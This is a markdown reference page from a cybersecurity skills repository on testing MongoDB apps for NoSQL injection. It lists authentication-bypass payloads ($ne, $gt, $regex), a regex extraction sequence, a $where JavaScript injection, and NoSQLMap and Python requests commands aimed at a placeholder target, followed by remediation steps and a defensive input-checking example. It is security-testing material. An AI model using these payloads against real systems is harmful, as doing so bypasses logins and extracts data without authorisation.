Anthropic-Cybersecurity-Skills/skills/exploiting-nosql-injection-vulnerabilities/references/api-reference.md
mukul975 c21af3347e Complete folder anatomy for all 649 cybersecurity skills + update LICENSE to Mahipal
- Add scripts/agent.py and references/api-reference.md to all remaining skills
- Update all 648 LICENSE files: copyright now reads 'Mahipal'
- Add implementing-security-monitoring-with-datadog (new skill with full anatomy)
- All 649 skills now have: SKILL.md, LICENSE, scripts/agent.py, references/api-reference.md
2026-03-11 00:22:12 +01:00

API Reference: NoSQL Injection Testing

MongoDB Query Operators

| Operator | Description | Injection Use |
|----------|-------------|---------------|
| $ne | Not equal | Bypass authentication |
| $gt | Greater than | Extract data |
| $regex | Regular expression | Pattern matching |
| $exists | Field exists | Enumerate fields |
| $where | JavaScript expression | Code execution |
| $or | Logical OR | Logic bypass |

Authentication Bypass Payloads

GET Parameters

?username[$ne]=&password[$ne]=
?username=admin&password[$gt]=
?username[$regex]=admin.*&password[$ne]=

JSON Body

{"username": {"$ne": ""}, "password": {"$ne": ""}}
{"username": "admin", "password": {"$gt": ""}}
{"username": {"$regex": "^admin"}, "password": {"$ne": ""}}

Data Extraction

Regex-Based Extraction

{"username": {"$regex": "^a"}, "password": {"$ne": ""}}
{"username": {"$regex": "^ad"}, "password": {"$ne": ""}}
{"username": {"$regex": "^adm"}, "password": {"$ne": ""}}

$where JavaScript Injection

{"$where": "this.username == 'admin' && this.password.match(/^a/)"}

Error-Based Detection

MongoDB Error Messages

| Error | Indicator |
|-------|-----------|
| MongoError | MongoDB driver error |
| CastError | Invalid ObjectId |
| BSONTypeError | Invalid BSON type |
| SyntaxError | JavaScript parse error |

Testing Tools

NoSQLMap

python nosqlmap.py --url http://target/api/login --method POST \
    --data '{"username":"test","password":"test"}'

Burp Suite Intruder

Use a NoSQL payload wordlist with parameter fuzzing.

Python requests Testing

GET Injection

import requests
url = "http://target/api/users"
resp = requests.get(f"{url}?username[$ne]=&password[$ne]=")

JSON Injection

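import requests
url = "http://target/api/users"  # same test endpoint as the GET example
payload = {"username": {"$ne": ""}, "password": {"$ne": ""}}
resp = requests.post(url, json=payload, timeout=10)  # sent as a JSON body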

Remediation

  1. Use parameterized queries (never concatenate user input)
  2. Validate input types (reject objects where strings expected)
  3. Use mongo-sanitize or equivalent input sanitization
  4. Disable $where operator if not needed
  5. Implement proper authentication (don't rely on query-level checks)
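
Remediation items 2 and 3 as an added Python example (not part of the original reference or the repository's code), run against the payload shapes listed above. The function names and the `username`/`password` field set are assumptions made for illustration.

```python
from urllib.parse import parse_qsl

FIELDS = ("username", "password")  # assumed login fields

class RejectedInput(ValueError):
    """Request carried operator-shaped or wrongly typed input."""

def strip_operator_keys(value):
    """Item 3: recursively drop keys starting with '$' (key-stripping sanitizer)."""
    if isinstance(value, dict):
        return {k: strip_operator_keys(v) for k, v in value.items()
                if not str(k).startswith("$")}
    if isinstance(value, list):
        return [strip_operator_keys(v) for v in value]
    return value

def require_strings(body):
    """Item 2: every expected field must be a plain str; extra keys are dropped."""
    if not isinstance(body, dict):
        raise RejectedInput("body must be a JSON object")
    for name in FIELDS:
        if not isinstance(body.get(name), str):
            raise RejectedInput(f"{name}: expected a string")
    return {name: body[name] for name in FIELDS}

def check_query(query_string):
    """Reject bracketed names such as username[$ne] in a raw query string."""
    pairs = parse_qsl(query_string, keep_blank_values=True)
    for name, _ in pairs:
        if name not in FIELDS:
            raise RejectedInput(f"unexpected parameter name: {name}")
    return require_strings(dict(pairs))

def is_rejected(check, arg):
    """True when the given check raises RejectedInput for arg."""
    try:
        check(arg)
    except RejectedInput:
        return True
    return False

# Constructed samples: payload shapes from this page plus one benign login.
SAMPLES = [{"username": {"$ne": ""}, "password": {"$ne": ""}},
           {"username": "admin", "password": {"$gt": ""}},
           {"$where": "this.username == 'admin'"},
           {"username": "alice", "password": "s3cret"}]

if __name__ == "__main__":
    for body in SAMPLES:
        # Stripping alone leaves {} where a string belongs, so type-check afterwards.
        verdict = is_rejected(require_strings, strip_operator_keys(body))
        print(body, "->", "rejected" if verdict else "accepted")
```

Stripping `$` keys turns `{"$ne": ""}` into `{}`, which is still not a string, so the type check is what actually closes the login bypass; the sanitizer is a second layer.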